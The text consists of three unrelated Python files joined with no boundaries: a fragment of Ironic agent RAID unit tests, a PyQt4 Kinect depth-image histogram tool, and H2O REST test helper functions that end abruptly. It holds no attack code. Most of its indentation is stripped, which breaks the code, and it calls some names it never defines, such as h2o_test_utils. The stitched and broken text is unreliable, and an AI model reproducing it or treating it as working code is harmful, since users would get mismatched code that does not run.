create_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
create_hook(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_bad_command_result(
self, update_raid_info_mock):
command = {}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
self.assertRaises(exception.IronicException,
raid_mgmt._create_configuration_final,
task, command)
self.assertFalse(update_raid_info_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_delete_configuration(self, execute_mock):
execute_mock.return_value = states.CLEANING
with task_manager.acquire(self.context, self.node.uuid) as task:
return_value = task.driver.raid.delete_configuration(task)
execute_mock.assert_called_once_with(task, self.clean_step)
self.assertEqual(states.CLEANING, return_value)
def test__delete_configuration_final(self):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.raid_config = {'foo': 'bar'}
raid_mgmt = agent.AgentRAID
raid_mgmt._delete_configuration_final(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
def test__delete_configuration_final_registered(
self):
self.node.clean_step = {'interface': 'raid',
'step': 'delete_configuration'}
self.node.raid_config = {'foo': 'bar'}
command = {'command_result': {'clean_result': 'foo'}}
delete_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
delete_hook(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
"""
Milton Orlando Sarria Paja
USC
Kinect and camera use
"""
import sys, os, random
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import numpy as np
import matplotlib.pyplot as plt
import cv2
from matplotlib.animation import FuncAnimation
import threading
import time
##
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
import freenect
def read_img():
file_name = '/home/sarria/data/images_kinect/im3.npz'
npzfile = np.load(file_name)
img0 = (npzfile['arr_0']).astype(float)
return img0
##########################################################
##########################################################
class kinect_cam():
def __init__(self):
self.isopen = True
self.rgb = np.array([])
self.depth = np.array([])
self.convert_rgb = True
self.convert_depth = True
#function to get RGB image from kinect
def _get_video(self):
self.rgb,_ = freenect.sync_get_video()
if self.convert_rgb:
self.rgb = cv2.cvtColor(self.rgb,cv2.COLOR_RGB2BGR)
return
#function to get depth image from kinect
def _get_depth(self):
self.depth,_ = freenect.sync_get_depth()
if self.convert_depth:
self.depth = self.depth.astype(np.uint8)
return
    #function check whether the kinect can be opened
    def isOpened(self):
        data = freenect.sync_get_depth()
        if data is None:
            self.isopen = False
            return False
        self.isopen = True
        return True
#function read depth camera
def read(self):
if self.isopen:
self._get_depth()
return self.depth
else:
return np.array([])
#function read rgb camera
def read_rgb(self):
if self.isopen:
self._get_video()
return self.rgb
else:
return np.array([])
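# A minimal usage sketch (illustrative, assuming a Kinect is attached and
# freenect is importable): grab one frame from each stream and display it.
#
#   cam = kinect_cam()
#   if cam.isOpened():
#       depth = cam.read()        # uint8 depth map
#       rgb = cam.read_rgb()      # BGR image, ready for cv2.imshow
#       cv2.imshow('depth', depth)
#       cv2.imshow('rgb', rgb)
#       cv2.waitKey(0)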
##########################################################
#class capture(threading.Thread):
class capture():
def __init__(self,source=0,tRead=70):
#threading.Thread.__init__(self)
# Create the VideoCapture object and define default values
#self.cam = cv2.VideoCapture(source)
self.cam = kinect_cam()
self.m = 1.0
self.b = 0.0
self.read = True
self.stop = False
self.tRead = tRead/1e3
self.window = None
self.filterSize = 5
        self.ap_mask = False
        self.filter = True
#if not self.cam.isOpened():
# print "Video device or file couldn't be opened"
# exit()
self.img_g = self.cam.read()
#if len(img_g.shape)==3:
# self.img_g = cv2.cvtColor(img_g, cv2.COLOR_BGR2GRAY)
#self.img_g=read_img()
#
self.mask = 255*np.ones(self.img_g.shape)
#self.img_g.astype(float)
self.process()
return
#pre-process image
def process(self):
if self.ap_mask:
self.img_g = self.mask - self.img_g
self.img_g = self.img_g*self.m+self.b
#self.img_g[self.img_g<0]=0
#self.img_g[self.img_g>255]=255
if self.filter:
self.img_g = cv2.blur(self.img_g,(self.filterSize,self.filterSize))
return
def run(self):
#read from camera
#while True:
#while not(self.read):
# pass
self.img_g = self.cam.read()
#if len(img.shape)==3:
# self.img_g = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#img=read_img()
#
#self.img_g.astype(float)
self.process()
        if self.window is not None:
            self.window.on_draw(self.img_g)
#time.sleep(self.tRead)
###########
#if self.stop:
# break
#return
#function kill process
def kill(self):
self.stop=True
return
##########################################################
##########################################################
class secWindow(QMainWindow):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
        # grid used to plot the image with the proper extent
self.X = None
self.Y = None
self.grid = False
self.showImg= False
self.contour= True
        # build the graphical environment
self.setWindowTitle('Resultado')
self.sec_frame = QWidget()
self.dpi = 100
self.fig = Figure((8.0, 6.0), dpi=self.dpi)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.sec_frame)
self.axes = self.fig.add_subplot(111)
self.axes.set_autoscaley_on(True)
self.axes.get_yaxis().set_visible(False)
self.axes.get_xaxis().set_visible(False)
self.axes.set_yticklabels([])
self.axes.set_xticklabels([])
vbox = QVBoxLayout()
vbox.addWidget(self.canvas)
self.sec_frame.setLayout(vbox)
self.setCentralWidget(self.sec_frame)
#function draws image including contour
def on_draw(self,img_g):
""" Redraws image
"""
if self.showImg:
if not(self.grid):
x = np.linspace(255, 0, img_g.shape[1])
y = np.linspace(255, 0, img_g.shape[0])
self.X, self.Y = np.meshgrid(x, y)
self.grid=True
self.axes.clear()
if self.contour:
self.axes.contour(self.X, self.Y,img_g, self.levels, colors='black')
self.axes.imshow(img_g,cmap = 'jet', extent=[255,0,0, 255])
self.canvas.draw()
return
    #function do not destroy the window, just hide it, and do not waste time plotting
def closeEvent(self, event):
self.showImg=False
self.hide()
##########################################################
########### main window frame ###########################
##########################################################
class AppForm(QMainWindow):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.setWindowTitle('Main: Modificar histograma')
self.minV = 0.0
self.maxV = 255.
self.m = 1.0
self.b = 0.0
self.img_obj= capture()
self.img0 = self.img_obj.img_g
#self.img_obj.start()
self.create_main_frame()
self.secW = secWindow(self.main_frame)
self.secW.levels = 6
self.img_obj.window = self.secW
self.timer = QTimer()
self.timer.timeout.connect(self.img_obj.run)
self.timer.start(70)
# self.timerStart = True
#function update histogram using current image
def updateHist(self):
self.axes1.clear()
self.axes1.axes.hist(self.img0.ravel(), 255, density=False, facecolor='g')
self.axes1.set_xlim(0, 255)
self.canvas.draw()
    #function update image in main frame using current image
def updateImg(self):
self.axes2.clear()
self.axes2.imshow(self.img0,cmap = 'jet', extent=[255,0,0, 255])
self.canvas.draw()
    #function adjust parameters: apply mask, filter, slope, intercept,
    #and levels for the contour plot
def adjustImg(self):
""" Update image
"""
self.img_obj.ap_mask = self.mask_cb.isChecked()
self.img_obj.filter = self.filter_cb.isChecked()
self.img_obj.m = self.m
self.img_obj.b = self.b
self.secW.levels = int(str(self.e1_levels.text()))
self.img_obj.filterSize = int(str(self.e2_filter.text()))
#time.sleep(0.070)
self.img0 = self.img_obj.img_g
self.updateHist()
self.updateImg()
return
    #function when a spinbox value changes, update the values of y = m*x + b
def valuechange(self):
"""Updates y=mx+b
"""
self.minV = self.sp1.value()
self.maxV = self.sp2.value()
self.m = 255./(self.maxV-self.minV)
self.b = -(self.m*self.minV)
self.label_m.setText(str(self.m))
self.label_b.setText(str(self.b))
return
    #function on close event, ask for confirmation (yes/no)
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message',
"Exit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.img_obj.stop=True
self.secW.close()
event.accept()
else:
event.ignore()
#function start the secondary window and show the image
def iniciar(self):
'''shows result of adjusting image
'''
self.secW.showImg=True
self.secW.show()
return
#function apply layout
def create_main_frame(self):
self.main_frame = QWidget()
# Create the mpl Figure and FigCanvas objects.
# 5x4 inches, 100 dots-per-inch
#
self.dpi = 100
self.fig = Figure((5.0, 4.0), dpi=self.dpi)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.main_frame)
#
self.axes1 = self.fig.add_subplot(121)
self.axes1.set_autoscaley_on(True)
self.axes1.grid(True)
self.updateHist()
self.axes2 = self.fig.add_subplot(122)
self.axes2.set_ylim(-1, 1)
# Turn off tick labels
self.axes2.get_yaxis().set_visible(False)
self.axes2.get_xaxis().set_visible(False)
self.axes2.set_yticklabels([])
self.axes2.set_xticklabels([])
self.updateImg()
# Other GUI controls
#
self.label_pendiente = QLabel("pendiente: ")
self.label_m = QLabel(str(self.m))
self.label_intercepto = QLabel("Intercepto: ")
self.label_b = QLabel(str(self.b))
self.adjust_button = QPushButton("Ajustar")
self.connect(self.adjust_button, SIGNAL('clicked()'), self.adjustImg)
Lspace1 = QLabel("\t\t\t")
Lspace2 = QLabel("\t\t\t\t\t\t\t\t\t\t\t\t\t")
Lspace3 = QLabel("\t\t\t\t\t\t\t\t\t\t\t\t\t")
self.l1 = QLabel("Min:")
self.sp1 = QSpinBox()
self.sp1.setMinimum(0)
self.sp1.setMaximum(255)
self.sp1.setValue(0)
self.sp1.valueChanged.connect(self.valuechange)
self.l2 = QLabel("Max:")
self.sp2 = QSpinBox()
self.sp2.setMinimum(0)
self.sp2.setMaximum(255)
self.sp2.setValue(255)
self.sp2.valueChanged.connect(self.valuechange)
self.l3 = QLabel("Niveles: ")
self.e1_levels = QLineEdit()
self.e1_levels.setText('6')
self.l4 = QLabel("Filter size: ")
self.e2_filter = QLineEdit()
self.e2_filter.setText('5')
self.mask_cb = QCheckBox("Mascara")
self.mask_cb.setChecked(True)
self.filter_cb = QCheckBox("Filtro")
self.filter_cb.setChecked(True)
self.start_button = QPushButton("Iniciar")
self.connect(self.start_button, SIGNAL('clicked()'), self.iniciar)
#
# Layout with box sizers
#
hbox1 = QHBoxLayout()
for w in [ self.label_pendiente, self.label_m, self.label_intercepto, self.label_b]:
hbox1.addWidget(w)
hbox1.setAlignment(w, Qt.AlignVCenter)
hbox2 = QHBoxLayout()
for w in [ self.l1, self.sp1, self.l2, self.sp2, self.l3, self.e1_levels, self.l4,
self.e2_filter,self.mask_cb,self.filter_cb]:
hbox2.addWidget(w)
hbox2.setAlignment(w, Qt.AlignVCenter)
hbox3 = QHBoxLayout()
hbox3.addWidget(self.adjust_button); hbox3.addWidget(Lspace2);
hbox4 = QHBoxLayout()
hbox4.addWidget(self.start_button); hbox4.addWidget(Lspace3);
vbox = QVBoxLayout()
vbox.addWidget(self.canvas)
vbox.addLayout(hbox1)
vbox.addLayout(hbox2)
vbox.addLayout(hbox3)
vbox.addLayout(hbox4)
self.main_frame.setLayout(vbox)
self.setCentralWidget(self.main_frame)
##########################################################
##########################################################
def main():
app = QApplication(sys.argv)
form = AppForm()
form.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main()
#self.axes2.spines['right'].set_visible(False)
import sys, os, time, json, datetime, errno, stat, getpass, requests, pprint
if sys.version_info[0] < 3: import urlparse
else: import urllib.parse as urlparse
import h2o
debug_rest = False
verbosity = 0 # 0, 1, 2, 3
pp = pprint.PrettyPrinter(indent=4) # pretty printer for debugging
def setVerbosity(level):
global verbosity
if level: verbosity = level
def isVerbose():
global verbosity
return verbosity > 0
def isVerboser():
global verbosity
return verbosity > 1
def isVerbosest():
global verbosity
return verbosity > 2
def sleep(secs):
    # if jenkins, don't let it sleep more than 2 minutes
    # due to left over h2o.sleep(3600)
    if getpass.getuser() == 'jenkins':
        period = min(secs, 120)
    else:
        period = secs
    time.sleep(period)
def dump_json(j):
return json.dumps(j, sort_keys=True, indent=2)
def check_params_update_kwargs(params_dict, kw, function, print_params):
# only update params_dict..don't add
# throw away anything else as it should come from the model (propagating what RF used)
for k in kw:
if k in params_dict:
params_dict[k] = kw[k]
else:
raise Exception("illegal parameter '%s' in %s" % (k, function))
if print_params:
print("%s parameters:" % function + repr(params_dict))
sys.stdout.flush()
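# A small illustration with hypothetical values: given
#   params_dict = {'ntrees': 50, 'max_depth': 5}
# the call check_params_update_kwargs(params_dict, {'ntrees': 10}, 'drf', False)
# leaves max_depth alone and sets ntrees to 10, while an unknown key such as
# {'foo': 1} raises Exception("illegal parameter 'foo' in drf").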
######################
# Assertion-type stuff
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def followPath(d, path_elems):
for path_elem in path_elems:
if "" != path_elem:
idx = -1
if path_elem.endswith("]"):
idx = int(path_elem[path_elem.find("[") + 1:path_elem.find("]")])
path_elem = path_elem[:path_elem.find("[")]
assert path_elem in d, "FAIL: Failed to find key: " + path_elem + " in dict: " + repr(d)
if -1 == idx:
d = d[path_elem]
else:
d = d[path_elem][idx]
return d
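# followPath walks a '/'-split path through nested dicts, honoring an optional
# [idx] suffix for list elements. Hypothetical example:
#   followPath({'key': {'models': [{'id': 7}]}}, ['key', 'models[0]'])
# returns {'id': 7}.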
def assertKeysExist(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key in d, "FAIL: Failed to find key: " + key + " in dict: " + repr(d)
def assertKeysExistAndNonNull(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key in d, "FAIL: Failed to find key: " + key + " in dict: " + repr(d)
        assert d[key] is not None, "FAIL: Value unexpectedly null: " + key + " in dict: " + repr(d)
def assertKeysDontExist(d, path, keys):
path_elems = path.split("/")
d = followPath(d, path_elems)
for key in keys:
assert key not in d, "FAIL: Unexpectedly found key: " + key + " in dict: " + repr(d)
###############
# LOGGING STUFF
# used to rename the sandbox when running multiple tests in same dir (in different shells)
def get_sandbox_name():
if "H2O_SANDBOX_NAME" in os.environ:
a = os.environ["H2O_SANDBOX_NAME"]
print("H2O_SANDBOX_NAME", a)
return a
else:
return "sandbox"
LOG_DIR = get_sandbox_name()
make_sure_path_exists(LOG_DIR)
def log(cmd, comment=None):
filename = LOG_DIR + '/commands.log'
# everyone can read
with open(filename, 'a') as f:
f.write(str(datetime.datetime.now()) + ' -- ')
# what got sent to h2o
# f.write(cmd)
# let's try saving the unencoded url instead..human readable
if cmd:
f.write(urlparse.unquote(cmd))
if comment:
f.write(' #')
f.write(comment)
f.write("\n")
elif comment: # for comment-only
f.write(comment + "\n")
# jenkins runs as 0xcustomer, and the file wants to be archived by jenkins who isn't in his group
permissions = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH
os.chmod(filename, permissions)
def log_rest(s):
if not debug_rest:
return
rest_log_file = open(os.path.join(LOG_DIR, "rest.log"), "a")
rest_log_file.write(s)
rest_log_file.write("\n")
rest_log_file.close()
######################
# REST API stuff
def list_to_dict(l, key):
'''
Given a List and a key to look for in each element return a Dict which maps the value of that key to the element.
Also handles nesting for the key, so you can use this for things like a list of elements which contain H2O Keys and
    return a Dict indexed by the 'name' element within the key.
list_to_dict([{'key': {'name': 'joe', 'baz': 17}}, {'key': {'name': 'bobby', 'baz': 42}}], 'key/name') =>
{'joe': {'key': {'name': 'joe', 'baz': 17}}, 'bobby': {'key': {'name': 'bobby', 'baz': 42}}}
'''
result = {}
for entry in l:
# print 'In list_to_dict, entry: ', repr(entry)
part = entry
k = None
for keypart in key.split('/'):
part = part[keypart]
k = keypart
# print 'for keypart: ', keypart, ' part: ', repr(part)
result[part] = entry
# print 'result: ', repr(result)
return result
def validate_builder(algo, builder):
''' Validate that a model builder seems to have a well-formed parameters list. '''
assert 'parameters' in builder, "FAIL: Failed to find parameters list in builder: " + algo + " (" + repr(builder) + ")"
assert isinstance(builder['parameters'], list), "FAIL: 'parameters' element is not a list in builder: " + algo + " (" + repr(builder) + ")"
parameters = builder['parameters']
assert len(parameters) > 0, "FAIL: parameters list is empty: " + algo + " (" + repr(builder) + ")"
for parameter in parameters:
assertKeysExist(parameter, '', ['name', 'help', 'required', 'type', 'default_value', 'actual_value', 'level', 'values'])
assert 'can_build' in builder, "FAIL: Failed to find can_build list in builder: " + algo + " (" + repr(builder) + ")"
assert isinstance(builder['can_build'], list), "FAIL: 'can_build' element is not a list in builder: " + algo + " (" + repr(builder) + ")"
assert len(builder['can_build']) > 0, "FAIL: 'can_build' list is empty in builder: " + algo + " (" + repr(builder) + ")"
def validate_model_builder_result(result, original_params, model_name):
'''
Validate that a model build result has no parameter validation errors,
and that it has a Job with a Key. Note that model build will return a
Job if successful, and a ModelBuilder with errors if it's not.
'''
global pp
error = False
if result is None:
print('FAIL: result for model %s is None, timeout during build? result: %s' % (model_name, result))
error = True
elif result['__http_response']['status_code'] != requests.codes.ok:
error = True
print("FAIL: expected 200 OK from a good validation request, got: " + str(result['__http_response']['status_code']))
print("dev_msg: " + result['dev_msg'])
elif 'error_count' in result and result['error_count'] > 0:
# error case
print('FAIL: Parameters validation error for model: ', model_name)
error = True
if error:
print('Input parameters: ')
pp.pprint(original_params)
print('Returned result: ')
pp.pprint(result)
assert result['error_count'] == 0, "FAIL: Non-zero error_count for model: " + model_name
    assert 'job' in result, "FAIL: Failed to find job key for model: " + model_name + ": " + pp.pformat(result)
    job = result['job']
    assert type(job) is dict, "FAIL: Job element for model is not a dict: " + model_name + ": " + pp.pformat(result)
    assert 'key' in job, "FAIL: Failed to find key in job for model: " + model_name + ": " + pp.pformat(result)
def validate_grid_builder_result(result, original_params, grid_params, grid_id):
'''
Validate that a grid build result has no parameter validation errors,
and that it has a Job with a Key.
'''
global pp
error = False
if result is None:
print('FAIL: result for grid %s is None, timeout during build? result: %s' % (grid_id, result))
error = True
elif result['__http_response']['status_code'] != requests.codes.ok:
error = True
print("FAIL: expected 200 OK from a good grid validation request, got: " + str(result['__http_response']['status_code']))
print("dev_msg: " + result['dev_msg'])
if error:
print('Input parameters: ')
pp.pprint(original_params)
print('Grid parameters: ')
pp.pprint(grid_params)
print('Returned result: ')
pp.pprint(result)
    assert result['job']['error_count'] == 0, "FAIL: Non-zero error_count for grid: " + grid_id
def validate_validation_messages(result, expected_error_fields):
'''
Check that we got the expected ERROR validation messages for a model build or validation check with bad parameters.
'''
assert 'error_count' in result, "FAIL: Failed to find error_count in bad-parameters model build result."
assert 0 < result['error_count'], "FAIL: 0 != error_count in bad-parameters model build validation result."
error_fields = []
for validation_message in result['messages']:
if validation_message['message_type'] == 'ERRR':
error_fields.append(validation_message['field_name'])
not_found = [item for item in expected_error_fields if item not in error_fields]
    assert len(not_found) == 0, 'FAIL: Failed to find all expected ERROR validation messages. Missing: ' + repr(not_found) + ' from fields: ' + repr(error_fields) + '; full messages: ' + repr(result['messages'])
def validate_model_exists(a_node, model_name):
'''
Validate that a given model key is found in the models list.
'''
models = a_node.models()['models']
models_dict = list_to_dict(models, 'model_id/name')
assert model_name in models_dict, "FAIL: Failed to find " + model_name + " in models list: " + repr(models_dict.keys())
return a_node.models(key=model_name)['models'][0]
def validate_frame_exists(a_node, frame_name, frames=None):
'''
Validate that a given frame key is found in the frames list.
'''
if frames is None:
result = a_node.frames()
frames = result['frames']
frames_dict = list_to_dict(frames, 'frame_id/name')
assert frame_name in frames_dict, "FAIL: Failed to find " + frame_name + " in frames list: " + repr(frames_dict.keys())
return frames_dict[frame_name]
def validate_job_exists(a_node, job_name, jobs=None):
'''
Validate that a given job key is found in the jobs list.
'''
if jobs is None:
result = a_node.jobs()
jobs = result['jobs']
jobs_dict = list_to_dict(jobs, 'key/name')
assert job_name in jobs_dict, "FAIL: Failed to find " + job_name + " in jobs list: " + repr(jobs_dict.keys())
return jobs_dict[job_name]
def validate_actual_parameters(input_parameters, actual_parameters, training_frame, validation_frame):
'''
Validate that the returned parameters list for a model build contains all the values we passed in as input.
'''
actuals_dict = list_to_dict(actual_parameters, 'name')
for k, expected in input_parameters.iteritems():
# TODO: skipping some stuff for now because they aren't serialized properly
if k == 'response_column':
continue
# TODO: skipping training_frame because model building is now changing the training frame. Why?!
if k == 'training_frame':
continue
# Python says True; json says true
assert k in actuals_dict, "FAIL: Expected key " + k + " not found in actual parameters list."
actual = actuals_dict[k]['actual_value']
actual_type = actuals_dict[k]['type']
if actual_type == 'boolean':
expected = bool(expected)
actual = True if 'true' == actual else False # true -> True
elif actual_type == 'int':
expected = int(expected)
actual = int(actual)
elif actual_type == 'long':
expected = long(expected)
actual = long(actual)
elif actual_type == 'string':
# convert from Unicode
expected = str(expected)
actual = str(actual)
elif actual_type == 'string[]':
# convert from Unicode
# expected = [str(expected_val) for expected_val in expected]
actual = [str(actual_val) for actual_val in actual]
elif actual_type == 'double':
expected = float(expected)
actual = float(actual)
elif actual_type == 'float':
expected = float(expected)
actual = float(actual)
elif actual_type.startswith('Key<'):
# For keys we send just a String but receive an object; compare by name
actual = actual['name']
# TODO: don't do exact comparison of floating point!
assert expected == actual, "FAIL: Parameter with name: " + k + " expected to have input value: " + str(expected) + ", instead has: " + str(actual) + " cast from: " + str(actuals_dict[k]['actual_value']) + " ( type of expected: " + str(type(expected)) + ", type of actual: " + str(type(actual)) + ")"
# TODO: training_frame, validation_frame
def validate_grid_parameters(grid_parameters, actual_parameters):
'''
Validate that the returned parameters list for a model build contains values we passed in as grid parameters.
'''
actuals_dict = list_to_dict(actual_parameters, 'name')
for k, grid_param_values in grid_parameters.iteritems():
# Python says True; json says true
assert k in actuals_dict, "FAIL: Expected key " + k + " not found in grid parameters list."
actual = actuals_dict[k]['actual_value']
actual_type = actuals_dict[k]['type']
if actual_type == 'boolean':
grid_param_values = [bool(x) for x in grid_param_values]
actual = True if 'true' == actual else False # true -> True
elif actual_type == 'int':
grid_param_values = [int(x) for x in grid_param_values]
actual = int(actual)
elif actual_type == 'long':
grid_param_values = [long(x) for x in grid_param_values]
actual = long(actual)
elif actual_type == 'string':
# convert from Unicode
grid_param_values = [str(x) for x in grid_param_values]
actual = str(actual)
elif actual_type == 'string[]':
# convert from Unicode
# grid_param_values = [str(grid_param_values_val) for grid_param_values_val in grid_param_values]
actual = [str(actual_val) for actual_val in actual]
elif actual_type == 'double':
grid_param_values = [float(x) for x in grid_param_values]
actual = float(actual)
elif actual_type == 'float':
grid_param_values = [float(x) for x in grid_param_values]
actual = float(actual)
elif actual_type.startswith('Key<'):
# For keys we send just a String but receive an object; compare by name
actual = actual['name']
# TODO: don't do exact comparison of floating point!
# print("actual_type: " + actual_type)
# print("actual: " + repr(actual) + " (" + str(type(actual)) + ")")
# print("grid_param_values: " + repr(grid_param_values))
# TODO: 1-d arrays only for the moment; no grid over DL layers
if actual_type.endswith(']'):
actual = actual[0]
# NOTE: check for IN
assert actual in grid_param_values, "FAIL: Parameter with name: " + k + " expected to be a possible grid value: " + str(grid_param_values) + ", instead has: " + str(actual) + " cast from: " + str(actuals_dict[k]['actual_value']) + " ( type of expected: " + str(type(grid_param_values[0])) + ", type of actual: " + str(type(actual)) + ")"
# TODO: training_frame, validation_frame
def fetch_and_validate_grid_sort(a_node, key, sort_by, decreasing):
# example: key='kmeans_prostate_grid', sort_by='totss', decreasing=True
grid = a_node.grid(key=key, sort_by=sort_by, decreasing=decreasing)
training_metrics = grid['training_metrics']
# check sorting:
criteria = []
# Unfortunately, we use mixed case in the JSON and lower case in the back end. . .
for mm in training_metrics:
for k, v in mm.iteritems():
if k.lower() == sort_by:
criteria.append(v)
break
unsorted = list(criteria)
criteria.sort(reverse=decreasing)
# print("criteria sorted: " + repr(criteria))
# print("original: " + repr(unsorted))
assert unsorted == criteria, "FAIL: model metrics were not sorted correctly by criterion: " + key + ", " + sort_by + ", decreasing: " + str(decreasing)
for i in range(len(grid['model_ids'])):
assert grid['model_ids'][i]['name'] == training_metrics[i]['model']['name'], "FAIL: model_ids not sorted in the same order as training_metrics for grid: " + key + ", index: " + str(i)
def validate_predictions(a_node, result, model_name, frame_key, expected_rows, predictions_frame=None):
'''
Validate a /Predictions result.
'''
assert result is not None, "FAIL: Got a null result for scoring: " + model_name + " on: " + frame_key
assert 'model_metrics' in result, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a model_metrics object."
mm = result['model_metrics'][0]
h2o.H2O.verboseprint('mm: ', repr(mm))
#assert 'auc' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain an AUC."
#assert 'cm' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a CM."
assert 'predictions' in mm, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a predictions section."
assert 'frame_id' in mm['predictions'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a key."
assert 'name' in mm['predictions']['frame_id'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a key name."
predictions_key = mm['predictions']['frame_id']['name']
f = a_node.frames(key=predictions_key, find_compatible_models=True, row_count=5)
frames = f['frames']
frames_dict = list_to_dict(frames, 'frame_id/name')
assert predictions_key in frames_dict, "FAIL: Failed to find predictions key " + predictions_key + " in Frames list."
predictions = mm['predictions']
h2o.H2O.verboseprint('prediction result: ', repr(result))
assert 'columns' in predictions, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain a columns section."
assert len(predictions['columns']) > 0, "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " does not contain any columns."
assert 'label' in predictions['columns'][0], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " column 0 has no label element."
assert 'predict' == predictions['columns'][0]['label'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " column 0 is not 'predict'."
assert expected_rows == predictions['rows'], "FAIL: Predictions for scoring: " + model_name + " on: " + frame_key + " has an unexpected number of rows."
assert 'predictions_frame' in result, "FAIL: failed to find 'predictions_frame' in predict result:" + h2o_test_utils.dump_json(result)
assert 'name' in result['predictions_frame'], "FAIL: failed to find name in 'predictions_frame' in predict result:" + h2o_test_utils.dump_json(result)
if predictions_frame is not None:
assert predictions_frame == result['predictions_frame']['name'], "FAIL: bad value for 'predictions_frame' in predict result; expected: " + predictions_frame + ", got: " + result['predictions_frame']['name']
def cleanup(a_node, models=None, frames=None):
'''
DELETE the specified models and frames from H2O.
'''
###################
# test delete_model
if models is None:
a_node.delete_models()
else:
for model in models:
a_node.delete_model(model)
ms = a_node.models()
if models is None:
assert 'models' in ms and 0 == len(ms['models']), "FAIL: Called delete_models and the models list isn't empty: " + h2o_test_utils.dump_json(ms)
else:
for model in models:
for m in ms['models']:
assert m['model_id']['name'] != model, 'FAIL: Found model that we tried to delete in the models list: ' + model
###################
# test delete_frame
if frames is not None:
for frame in frames:
a_node.delete_frame(frame)
ms = a_node.frames(row_count=5)
for m in ms['frames']:
assert m['frame_id']['name'] != frame, 'FAIL: Found frame that we tried to delete in the frames list: ' + frame
# TODO
####################
# test delete_models
# jobs = a_node.build_model(algo='kmeans', model_id='dummy', training_frame='prostate_binomial', parameters={'k': 2 }, timeoutSecs=240) # synchronous
# a_node.delete_models()
# models = a_node.models()
# assert 'models' in models and 0 == len(models['models']), "FAIL: Called delete_models and the models list isn't empty: " + h2o_test_utils.dump_json(models)
# TODO
####################
# test delete_frames
class ModelSpec(dict):
'''
Dictionary which specifies all that's needed to build and validate a model.
'''
def __init__(self, dest_key, algo, frame_key, params, model_category):
self['algo'] = algo
self['frame_key'] = frame_key
self['params'] = params
self['model_category'] = model_category
if dest_key is None:
self['dest_key'] = algo + "_" + frame_key
else:
self['dest_key'] = dest_key
@staticmethod
def for_dataset(dest_key, algo, dataset, params):
'''
Factory for creating a ModelSpec for a given Dataset (frame and additional metadata).
'''
dataset_params = {}
assert 'model_category' in dataset, "FAIL: Failed to find model_category in dataset: " + repr(dataset)
if 'response_column' in dataset: dataset_params['response_column'] = dataset['response_column']
if 'ignored_columns' in dataset: dataset_params['ignored_columns'] = dataset['ignored_columns']
return ModelSpec(dest_key, algo, dataset['dest_key'], dict(dataset_params.items() + params.items()), dataset['model_category'])
def build_and_validate_model(self, a_node):
before = time.time()
if isVerbose(): print('About to build: ' + self['dest_key'] + ', a ' + self['algo'] + ' model on frame: ' + self['frame_key'] + ' with params: ' + repr(self['params']))
result = a_node.build_model(algo=self['algo'], model_id=self['dest_key'], training_frame=self['frame_key'], parameters=self['params'], timeoutSecs=240) # synchronous
validate_model_builder_result(result, self['params'], self['dest_key'])
model = validate_model_exists(a_node, self['dest_key'])
validate_actual_parameters(self['params'], model['parameters'], self['frame_key'], None)
# TODO: refactor into helper
assert 'output' in model, 'FAIL: Failed to find output object in model: ' + self['dest_key']
assert 'model_category' in model['output'], 'FAIL: Failed to find model_category in model: ' + self['dest_key']
assert model['output']['model_category'] == self['model_category'], 'FAIL: Expected model_category: ' + self['model_category'] + ' but got: ' + model['output']['model_category'] + ' for model: ' + self['dest_key']
if isVerbose(): print('Done building: ' + self['dest_key'] + " (" + str(time.time() - before) + ")")
return model
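# Minimal usage sketch (assumes a live node handle `a_node` and an already
# parsed frame 'prostate.hex'; the destination key, params and model
# category here are illustrative, not canonical):
def _example_build_kmeans(a_node):
    spec = ModelSpec('kmeans_prostate', 'kmeans', 'prostate.hex',
                     {'k': 2}, 'Clustering')
    return spec.build_and_validate_model(a_node)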
class GridSpec(dict):
'''
Dictionary which specifies all that's needed to build and validate a grid of models.
'''
def __init__(self, dest_key, algo, frame_key, params, grid_params, model_category, search_criteria=None):
self['algo'] = algo
self['frame_key'] = frame_key
self['params'] = params
self['grid_params'] = grid_params
self['model_category'] = model_category
self['search_criteria'] = search_criteria
if dest_key is None:
self['dest_key'] = algo + "_" + frame_key
else:
self['dest_key'] = dest_key
@staticmethod
